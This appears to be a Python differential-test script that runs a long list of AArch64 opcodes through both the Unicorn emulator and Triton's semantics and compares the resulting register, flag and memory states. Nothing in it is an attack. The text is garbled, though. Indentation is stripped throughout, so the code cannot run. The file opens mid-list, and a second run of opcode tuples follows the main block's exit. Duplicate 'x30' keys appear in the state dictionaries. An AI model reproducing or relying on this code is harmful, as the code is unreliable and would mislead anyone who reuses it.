("\x20\x2c\xc2\x9a", "ror x0, x1, x2"),
("\x40\x2c\xc1\x9a", "ror x0, x2, x1"),
("\x40\x00\xc2\x93", "ror x0, x2, #0"),
("\x40\x04\xc2\x93", "ror x0, x2, #1"),
("\x40\x08\xc2\x93", "ror x0, x2, #2"),
("\x40\x0c\xc2\x93", "ror x0, x2, #3"),
("\x40\x10\xc2\x93", "ror x0, x2, #4"),
("\x40\xf8\xc2\x93", "ror x0, x2, #62"),
("\x40\xfc\xc2\x93", "ror x0, x2, #63"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\x80\xd2", "mov x1, #0"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x41\x00\x80\xd2", "mov x1, #1 << 1"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x81\x00\x80\xd2", "mov x1, #1 << 2"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\x82\xd2", "mov x1, #1 << 12"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\x82\xd2", "mov x1, #1 << 12"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\xb0\xd2", "mov x1, #1 << 31"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x21\x00\xc0\xd2", "mov x1, #1 << 32"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x41\x00\xc0\xd2", "mov x1, #1 << 33"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\xe8\xd2", "mov x1, #1 << 62"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\xf0\xd2", "mov x1, #1 << 63"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x21\x00\x80\xd2", "mov x1, #1 << 64"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\xdf\xc8", "ldar x5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\xdf\xc8", "ldar x9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\xdf\xc8", "ldar x11, [sp]"),
("\xff\xff\xdf\xc8", "ldar xzr, [sp]"),
("\xe7\xff\xdf\x88", "ldar w7, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\xdf\x08", "ldarb w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\xdf\x08", "ldarb w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\xdf\x08", "ldarb w11, [sp]"),
("\xff\xff\xdf\x08", "ldarb wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\xdf\x48", "ldarh w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\xdf\x48", "ldarh w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\xdf\x48", "ldarh w11, [sp]"),
("\xff\xff\xdf\x48", "ldarh wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\x5f\xc8", "ldaxr x5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\x5f\xc8", "ldaxr x9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x5f\xc8", "ldaxr x11, [sp]"),
("\xff\xff\x5f\xc8", "ldaxr xzr, [sp]"),
("\xe7\xff\x5f\x88", "ldaxr w7, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\x5f\x08", "ldaxrb w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\x5f\x08", "ldaxrb w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x5f\x08", "ldaxrb w11, [sp]"),
("\xff\xff\x5f\x08", "ldaxrb wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\x5f\x48", "ldaxrh w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\x5f\x48", "ldaxrh w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x5f\x48", "ldaxrh w11, [sp]"),
("\xff\xff\x5f\x48", "ldaxrh wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x64\xa0\x84\xd2", "movz x4, #9475"),
("\xe5\x24\x81\xd2", "movz x5, #2343"),
("\xa6\xaf\x81\xd2", "movz x6, #3453"),
("\x87\x3a\x82\xd2", "movz x7, #4564"),
("\xe8\x16\x84\xd2", "movz x8, #8375"),
("\xe9\xc1\x84\xd2", "movz x9, #9743"),
("\xea\xaa\x82\xd2", "movz x10, #5463"),
("\x2b\xf8\x80\xd2", "movz x11, #1985"),
("\x25\xfc\x9f\xc8", "stlr x5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x9f\xc8", "stlr x11, [sp]"),
("\x25\x00\x00\xf8", "stur x5, [x1]"),
("\x26\x00\x00\x38", "sturb w6, [x1]"),
("\x27\x00\x00\x78", "sturh w7, [x1]"),
("\x29\xfc\x9f\xc8", "stlr x9, [x1]"),
("\x2a\xfc\x9f\x08", "stlrb w10, [x1]"),
("\x2b\xfc\x9f\x48", "stlrh w11, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x7c\x5f\xc8", "ldxr x0, [x1]"),
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+24
("\x20\x7c\x5f\x08", "ldxrb w0, [x1]"),
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+36
("\x20\x7c\x5f\x48", "ldxrh w0, [x1]"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x0c\xc0\xda", "rev x0, x1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x08\xc0\x5a", "rev w0, w1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x04\xc0\xda", "rev16 x0, x1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x04\xc0\x5a", "rev16 w0, w1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x08\xc0\xda", "rev32 x0, x1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x00\xc0\xda", "rbit x0, x1"),
("\x20\x00\xc0\x5a", "rbit w0, w1"),
("\x20\x00\x80\xd2", "movz x0, #1"),
("\x20\x00\xc0\xda", "rbit x0, x1"),
("\x20\x00\xc0\x5a", "rbit w0, w1"),
]
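
# The vectors above form one long sequential program mapped at ADDR: each
# instruction starts from the register, flag, stack and heap state left by
# the previous one, so the ordering inside CODE matters.
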
def emu_with_unicorn(opcode, istate):
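    # Runs a single opcode under Unicorn starting from `istate` (256-byte
    # stack/heap snapshots, x0..x30, pc, sp and the NZCV flags) and returns
    # the resulting state as a dict of the same shape.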
# Initialize emulator in aarch64 mode
mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)
# map memory for this emulation
mu.mem_map(ADDR, SIZE)
# write machine code to be emulated to memory
index = 0
for op, _ in CODE:
mu.mem_write(ADDR+index, op)
index += len(op)
mu.mem_write(STACK, bytes(istate['stack']))
mu.mem_write(HEAP, bytes(istate['heap']))
mu.reg_write(UC_ARM64_REG_X0, istate['x0'])
mu.reg_write(UC_ARM64_REG_X1, istate['x1'])
mu.reg_write(UC_ARM64_REG_X2, istate['x2'])
mu.reg_write(UC_ARM64_REG_X3, istate['x3'])
mu.reg_write(UC_ARM64_REG_X4, istate['x4'])
mu.reg_write(UC_ARM64_REG_X5, istate['x5'])
mu.reg_write(UC_ARM64_REG_X6, istate['x6'])
mu.reg_write(UC_ARM64_REG_X7, istate['x7'])
mu.reg_write(UC_ARM64_REG_X8, istate['x8'])
mu.reg_write(UC_ARM64_REG_X9, istate['x9'])
mu.reg_write(UC_ARM64_REG_X10, istate['x10'])
mu.reg_write(UC_ARM64_REG_X11, istate['x11'])
mu.reg_write(UC_ARM64_REG_X12, istate['x12'])
mu.reg_write(UC_ARM64_REG_X13, istate['x13'])
mu.reg_write(UC_ARM64_REG_X14, istate['x14'])
mu.reg_write(UC_ARM64_REG_X15, istate['x15'])
mu.reg_write(UC_ARM64_REG_X16, istate['x16'])
mu.reg_write(UC_ARM64_REG_X17, istate['x17'])
mu.reg_write(UC_ARM64_REG_X18, istate['x18'])
mu.reg_write(UC_ARM64_REG_X19, istate['x19'])
mu.reg_write(UC_ARM64_REG_X20, istate['x20'])
mu.reg_write(UC_ARM64_REG_X21, istate['x21'])
mu.reg_write(UC_ARM64_REG_X22, istate['x22'])
mu.reg_write(UC_ARM64_REG_X23, istate['x23'])
mu.reg_write(UC_ARM64_REG_X24, istate['x24'])
mu.reg_write(UC_ARM64_REG_X25, istate['x25'])
mu.reg_write(UC_ARM64_REG_X26, istate['x26'])
mu.reg_write(UC_ARM64_REG_X27, istate['x27'])
mu.reg_write(UC_ARM64_REG_X28, istate['x28'])
mu.reg_write(UC_ARM64_REG_X29, istate['x29'])
mu.reg_write(UC_ARM64_REG_X30, istate['x30'])
mu.reg_write(UC_ARM64_REG_PC, istate['pc'])
mu.reg_write(UC_ARM64_REG_SP, istate['sp'])
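    # pack the N, Z, C and V bits into Unicorn's NZCV register (bits 31..28)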
mu.reg_write(UC_ARM64_REG_NZCV, istate['n'] << 31 | istate['z'] << 30 | istate['c'] << 29 | istate['v'] << 28)
    # emulate only this one opcode (no timeout, no instruction-count limit)
mu.emu_start(istate['pc'], istate['pc'] + len(opcode))
ostate = {
"stack": mu.mem_read(STACK, 0x100),
"heap": mu.mem_read(HEAP, 0x100),
"x0": mu.reg_read(UC_ARM64_REG_X0),
"x1": mu.reg_read(UC_ARM64_REG_X1),
"x2": mu.reg_read(UC_ARM64_REG_X2),
"x3": mu.reg_read(UC_ARM64_REG_X3),
"x4": mu.reg_read(UC_ARM64_REG_X4),
"x5": mu.reg_read(UC_ARM64_REG_X5),
"x6": mu.reg_read(UC_ARM64_REG_X6),
"x7": mu.reg_read(UC_ARM64_REG_X7),
"x8": mu.reg_read(UC_ARM64_REG_X8),
"x9": mu.reg_read(UC_ARM64_REG_X9),
"x10": mu.reg_read(UC_ARM64_REG_X10),
"x11": mu.reg_read(UC_ARM64_REG_X11),
"x12": mu.reg_read(UC_ARM64_REG_X12),
"x13": mu.reg_read(UC_ARM64_REG_X13),
"x14": mu.reg_read(UC_ARM64_REG_X14),
"x15": mu.reg_read(UC_ARM64_REG_X15),
"x16": mu.reg_read(UC_ARM64_REG_X16),
"x17": mu.reg_read(UC_ARM64_REG_X17),
"x18": mu.reg_read(UC_ARM64_REG_X18),
"x19": mu.reg_read(UC_ARM64_REG_X19),
"x20": mu.reg_read(UC_ARM64_REG_X20),
"x21": mu.reg_read(UC_ARM64_REG_X21),
"x22": mu.reg_read(UC_ARM64_REG_X22),
"x23": mu.reg_read(UC_ARM64_REG_X23),
"x24": mu.reg_read(UC_ARM64_REG_X24),
"x25": mu.reg_read(UC_ARM64_REG_X25),
"x26": mu.reg_read(UC_ARM64_REG_X26),
"x27": mu.reg_read(UC_ARM64_REG_X27),
"x28": mu.reg_read(UC_ARM64_REG_X28),
"x29": mu.reg_read(UC_ARM64_REG_X29),
"x30": mu.reg_read(UC_ARM64_REG_X30),
"x30": mu.reg_read(UC_ARM64_REG_X30),
"pc": mu.reg_read(UC_ARM64_REG_PC),
"sp": mu.reg_read(UC_ARM64_REG_SP),
"n": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 31) & 1),
"z": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 30) & 1),
"c": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 29) & 1),
"v": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 28) & 1),
}
return ostate
def emu_with_triton(opcode, istate):
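    # Runs the same single opcode through Triton's AArch64 semantics from
    # `istate` and returns the output state in the same dict shape as
    # emu_with_unicorn(), so the two results can be compared directly.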
ctx = TritonContext()
ctx.setArchitecture(ARCH.AARCH64)
inst = Instruction(opcode)
inst.setAddress(istate['pc'])
ctx.setConcreteMemoryAreaValue(STACK, bytes(istate['stack']))
ctx.setConcreteMemoryAreaValue(HEAP, bytes(istate['heap']))
ctx.setConcreteRegisterValue(ctx.registers.x0, istate['x0'])
ctx.setConcreteRegisterValue(ctx.registers.x1, istate['x1'])
ctx.setConcreteRegisterValue(ctx.registers.x2, istate['x2'])
ctx.setConcreteRegisterValue(ctx.registers.x3, istate['x3'])
ctx.setConcreteRegisterValue(ctx.registers.x4, istate['x4'])
ctx.setConcreteRegisterValue(ctx.registers.x5, istate['x5'])
ctx.setConcreteRegisterValue(ctx.registers.x6, istate['x6'])
ctx.setConcreteRegisterValue(ctx.registers.x7, istate['x7'])
ctx.setConcreteRegisterValue(ctx.registers.x8, istate['x8'])
ctx.setConcreteRegisterValue(ctx.registers.x9, istate['x9'])
ctx.setConcreteRegisterValue(ctx.registers.x10, istate['x10'])
ctx.setConcreteRegisterValue(ctx.registers.x11, istate['x11'])
ctx.setConcreteRegisterValue(ctx.registers.x12, istate['x12'])
ctx.setConcreteRegisterValue(ctx.registers.x13, istate['x13'])
ctx.setConcreteRegisterValue(ctx.registers.x14, istate['x14'])
ctx.setConcreteRegisterValue(ctx.registers.x15, istate['x15'])
ctx.setConcreteRegisterValue(ctx.registers.x16, istate['x16'])
ctx.setConcreteRegisterValue(ctx.registers.x17, istate['x17'])
ctx.setConcreteRegisterValue(ctx.registers.x18, istate['x18'])
ctx.setConcreteRegisterValue(ctx.registers.x19, istate['x19'])
ctx.setConcreteRegisterValue(ctx.registers.x20, istate['x20'])
ctx.setConcreteRegisterValue(ctx.registers.x21, istate['x21'])
ctx.setConcreteRegisterValue(ctx.registers.x22, istate['x22'])
ctx.setConcreteRegisterValue(ctx.registers.x23, istate['x23'])
ctx.setConcreteRegisterValue(ctx.registers.x24, istate['x24'])
ctx.setConcreteRegisterValue(ctx.registers.x25, istate['x25'])
ctx.setConcreteRegisterValue(ctx.registers.x26, istate['x26'])
ctx.setConcreteRegisterValue(ctx.registers.x27, istate['x27'])
ctx.setConcreteRegisterValue(ctx.registers.x28, istate['x28'])
ctx.setConcreteRegisterValue(ctx.registers.x29, istate['x29'])
ctx.setConcreteRegisterValue(ctx.registers.x30, istate['x30'])
ctx.setConcreteRegisterValue(ctx.registers.pc, istate['pc'])
ctx.setConcreteRegisterValue(ctx.registers.sp, istate['sp'])
ctx.setConcreteRegisterValue(ctx.registers.n, istate['n'])
ctx.setConcreteRegisterValue(ctx.registers.z, istate['z'])
ctx.setConcreteRegisterValue(ctx.registers.c, istate['c'])
ctx.setConcreteRegisterValue(ctx.registers.v, istate['v'])
ctx.processing(inst)
    # Debug: uncomment to dump the symbolic expressions of the instruction.
    #print inst
    #for x in inst.getSymbolicExpressions():
    #    print x
ostate = {
"stack": ctx.getConcreteMemoryAreaValue(STACK, 0x100),
"heap": ctx.getConcreteMemoryAreaValue(HEAP, 0x100),
"x0": ctx.getSymbolicRegisterValue(ctx.registers.x0),
"x1": ctx.getSymbolicRegisterValue(ctx.registers.x1),
"x2": ctx.getSymbolicRegisterValue(ctx.registers.x2),
"x3": ctx.getSymbolicRegisterValue(ctx.registers.x3),
"x4": ctx.getSymbolicRegisterValue(ctx.registers.x4),
"x5": ctx.getSymbolicRegisterValue(ctx.registers.x5),
"x6": ctx.getSymbolicRegisterValue(ctx.registers.x6),
"x7": ctx.getSymbolicRegisterValue(ctx.registers.x7),
"x8": ctx.getSymbolicRegisterValue(ctx.registers.x8),
"x9": ctx.getSymbolicRegisterValue(ctx.registers.x9),
"x10": ctx.getSymbolicRegisterValue(ctx.registers.x10),
"x11": ctx.getSymbolicRegisterValue(ctx.registers.x11),
"x12": ctx.getSymbolicRegisterValue(ctx.registers.x12),
"x13": ctx.getSymbolicRegisterValue(ctx.registers.x13),
"x14": ctx.getSymbolicRegisterValue(ctx.registers.x14),
"x15": ctx.getSymbolicRegisterValue(ctx.registers.x15),
"x16": ctx.getSymbolicRegisterValue(ctx.registers.x16),
"x17": ctx.getSymbolicRegisterValue(ctx.registers.x17),
"x18": ctx.getSymbolicRegisterValue(ctx.registers.x18),
"x19": ctx.getSymbolicRegisterValue(ctx.registers.x19),
"x20": ctx.getSymbolicRegisterValue(ctx.registers.x20),
"x21": ctx.getSymbolicRegisterValue(ctx.registers.x21),
"x22": ctx.getSymbolicRegisterValue(ctx.registers.x22),
"x23": ctx.getSymbolicRegisterValue(ctx.registers.x23),
"x24": ctx.getSymbolicRegisterValue(ctx.registers.x24),
"x25": ctx.getSymbolicRegisterValue(ctx.registers.x25),
"x26": ctx.getSymbolicRegisterValue(ctx.registers.x26),
"x27": ctx.getSymbolicRegisterValue(ctx.registers.x27),
"x28": ctx.getSymbolicRegisterValue(ctx.registers.x28),
"x29": ctx.getSymbolicRegisterValue(ctx.registers.x29),
"x30": ctx.getSymbolicRegisterValue(ctx.registers.x30),
"x30": ctx.getSymbolicRegisterValue(ctx.registers.x30),
"pc": ctx.getSymbolicRegisterValue(ctx.registers.pc),
"sp": ctx.getSymbolicRegisterValue(ctx.registers.sp),
"n": ctx.getSymbolicRegisterValue(ctx.registers.n),
"z": ctx.getSymbolicRegisterValue(ctx.registers.z),
"c": ctx.getSymbolicRegisterValue(ctx.registers.c),
"v": ctx.getSymbolicRegisterValue(ctx.registers.v),
}
return ostate
def diff_state(state1, state2):
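    # Prints every register, flag or memory area that differs between the
    # Unicorn output state (state1) and the Triton output state (state2).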
for k, v in list(state1.items()):
if (k == 'heap' or k == 'stack') and v != state2[k]:
print('\t%s: (UC) != (TT)' %(k))
elif not (k == 'heap' or k == 'stack') and v != state2[k]:
print('\t%s: %#x (UC) != %#x (TT)' %(k, v, state2[k]))
return
if __name__ == '__main__':
# initial state
state = {
"stack": "".join([chr(255 - i) for i in range(256)]),
"heap": "".join([chr(i) for i in range(256)]),
"x0": 0,
"x1": 0,
"x2": 0,
"x3": 0,
"x4": 0,
"x5": 0,
"x6": 0,
"x7": 0,
"x8": 0,
"x9": 0,
"x10": 0,
"x11": 0,
"x12": 0,
"x13": 0,
"x14": 0,
"x15": 0,
"x16": 0,
"x17": 0,
"x18": 0,
"x19": 0,
"x20": 0,
"x21": 0,
"x22": 0,
"x23": 0,
"x24": 0,
"x25": 0,
"x26": 0,
"x27": 0,
"x28": 0,
"x29": 0,
"x30": 0,
"x30": 0,
"pc": ADDR,
"sp": STACK,
"n": 0,
"z": 0,
"c": 0,
"v": 0,
}
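
    # Differential loop: run each opcode through both engines, stop at the
    # first divergence, and seed the next iteration with Triton's output state.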
for opcode, disassembly in CODE:
try:
uc_state = emu_with_unicorn(opcode, state)
tt_state = emu_with_triton(opcode, state)
except Exception as e:
print('[KO] %s' %(disassembly))
print('\t%s' %(e))
sys.exit(-1)
if uc_state != tt_state:
print('[KO] %s' %(disassembly))
diff_state(uc_state, tt_state)
sys.exit(-1)
print('[OK] %s' %(disassembly))
state = tt_state
sys.exit(0)
("\x20\x18\x40\xd2", "eor x0, x1, #0x7f"),
("\x20\x00\x40\xd2", "eor x0, x1, #1"),
("\x20\x00\x22\xca", "eon x0, x1, x2, lsl #0"),
("\x20\x04\x22\xca", "eon x0, x1, x2, lsl #1"),
("\x20\x20\x22\xca", "eon x0, x1, x2, lsl #8"),
("\x20\x40\x22\xca", "eon x0, x1, x2, lsl #16"),
("\x20\x80\x22\xca", "eon x0, x1, x2, lsl #32"),
("\x20\x84\x22\xca", "eon x0, x1, x2, lsl #33"),
("\x20\x88\x22\xca", "eon x0, x1, x2, lsl #34"),
("\x20\x00\x62\xca", "eon x0, x1, x2, lsr #0"),
("\x20\x04\x62\xca", "eon x0, x1, x2, lsr #1"),
("\x20\x20\x62\xca", "eon x0, x1, x2, lsr #8"),
("\x20\x40\x62\xca", "eon x0, x1, x2, lsr #16"),
("\x20\x80\x62\xca", "eon x0, x1, x2, lsr #32"),
("\x20\x84\x62\xca", "eon x0, x1, x2, lsr #33"),
("\x20\x88\x62\xca", "eon x0, x1, x2, lsr #34"),
("\x20\x20\xa2\xca", "eon x0, x1, x2, asr #8"),
("\x20\x40\xa2\xca", "eon x0, x1, x2, asr #16"),
("\x20\x80\xa2\xca", "eon x0, x1, x2, asr #32"),
("\x20\x84\xa2\xca", "eon x0, x1, x2, asr #33"),
("\x20\x88\xa2\xca", "eon x0, x1, x2, asr #34"),
("\x20\x88\xa2\xca", "eon x0, x1, x2, asr #34"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x00\x22\xaa", "orn x0, x1, x2"),
("\x40\x00\x21\xaa", "orn x0, x2, x1"),
("\x41\x00\x20\xaa", "orn x1, x2, x0"),
("\x01\x00\x22\xaa", "orn x1, x0, x2"),
("\x20\x04\x22\xaa", "orn x0, x1, x2, lsl #1"),
("\x20\x08\x22\xaa", "orn x0, x1, x2, lsl #2"),
("\x20\x0c\x22\xaa", "orn x0, x1, x2, lsl #3"),
("\x20\x04\xe2\xaa", "orn x0, x1, x2, ror #1"),
("\x20\x08\xe2\xaa", "orn x0, x1, x2, ror #2"),
("\x20\x0c\xe2\xaa", "orn x0, x1, x2, ror #3"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x00\x02\xaa", "orr x0, x1, x2"),
("\x40\x00\x01\xaa", "orr x0, x2, x1"),
("\x41\x00\x00\xaa", "orr x1, x2, x0"),
("\x01\x00\x02\xaa", "orr x1, x0, x2"),
("\x20\x04\x02\xaa", "orr x0, x1, x2, lsl #1"),
("\x20\x08\x02\xaa", "orr x0, x1, x2, lsl #2"),
("\x20\x0c\x02\xaa", "orr x0, x1, x2, lsl #3"),
("\x20\x04\xc2\xaa", "orr x0, x1, x2, ror #1"),
("\x20\x08\xc2\xaa", "orr x0, x1, x2, ror #2"),
("\x20\x0c\xc2\xaa", "orr x0, x1, x2, ror #3"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\x00\x40\xf9", "ldr x5, [x1]"),
("\x26\x04\x40\xf8", "ldr x6, [x1], #0"),
("\x27\x44\x40\xf8", "ldr x7, [x1], #4"),
("\x28\x68\x62\xf8", "ldr x8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x5e\xf8", "ldr x9, [x1], #-30"),
("\x2a\x8c\x40\xf8", "ldr x10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x40\xf9", "ldr x11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\x00\x40\x39", "ldrb w5, [x1]"),
("\x26\x04\x40\x38", "ldrb w6, [x1], #0"),
("\x27\x44\x40\x38", "ldrb w7, [x1], #4"),
("\x28\x68\x62\x38", "ldrb w8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x5e\x38", "ldrb w9, [x1], #-30"),
("\x2a\x8c\x40\x38", "ldrb w10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x40\x39", "ldrb w11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\x00\x40\x79", "ldrh w5, [x1]"),
("\x26\x04\x40\x78", "ldrh w6, [x1], #0"),
("\x27\x44\x40\x78", "ldrh w7, [x1], #4"),
("\x28\x68\x62\x78", "ldrh w8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x5e\x78", "ldrh w9, [x1], #-30"),
("\x2a\x8c\x40\x78", "ldrh w10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x40\x79", "ldrh w11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x24\x14\x40\xa9", "ldp x4, x5, [x1]"),
("\x25\x18\xc0\xa8", "ldp x5, x6, [x1], #0"),
("\x26\x9c\xc0\xa8", "ldp x6, x7, [x1], #8"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x28\x24\xfe\xa8", "ldp x8, x9, [x1], #-32"),
("\x29\x28\xc1\xa9", "ldp x9, x10, [x1, #16]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xea\x2f\x40\xa9", "ldp x10, x11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x24\x14\x40\x29", "ldp w4, w5, [x1]"),
("\x25\x18\xc0\x28", "ldp w5, w6, [x1], #0"),
("\x26\x1c\xc1\x28", "ldp w6, w7, [x1], #8"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x28\x24\xfc\x28", "ldp w8, w9, [x1], #-32"),
("\x29\x28\xc2\x29", "ldp w9, w10, [x1, #16]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
